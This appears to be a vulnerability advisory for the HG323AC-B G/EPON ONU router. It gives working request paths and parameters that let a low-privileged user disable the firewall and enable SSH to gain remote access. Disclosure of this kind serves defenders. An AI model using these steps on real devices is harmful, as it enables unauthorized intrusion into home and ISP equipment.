Item: G/EPON ONU
Specification: HG323AC-B
Device model XPON+2GE+1POTS+2WIFI+USB
Device SN 70B64F-1234570B64F0C2C0C
Hardware Version V1.0
Firmware Version V2.0.08-210715
PON S/N GPON000C2C0C
Incorrect Access Control
To exploit the vulnerability, it is necessary to be authenticated with a low-privileged user, as it will be possible to execute administrator functions (Disable firewall and enable SSH or Telnet,etc).
After obtaining credentials, it will be necessary to retrieve the token mask of your current user by accessing the directory http://IP/boaform/getASPdata/FMask.
With the valid token, you can assemble a POST request to disable the firewall with the token of your user that does not have this permission. The directory to disable the firewall is /boaform/getASPdata/formFirewall with the parameters FirewallLevel=0&DosEnable=0&csrfMask=USER ID.
As a result, the application will respond with a SUCCESS.
With the firewall disabled, you can enable SSH through another POST request in the directory /boaform/getASPdata/formAcc - with the parameter l_ssh SSH equals to 1
This way, you can disable the firewall, enable SSH, and log in with your user through SSH.
The application does not handle user correctly.
The Vulnerability allows a non priviliged user disable all of the firewall rules, open any avalible service (SSH, TELNET, FTP) and connect to it, causing RCE through SSH. Only do it against infrastructure for which you have recieved permission to test.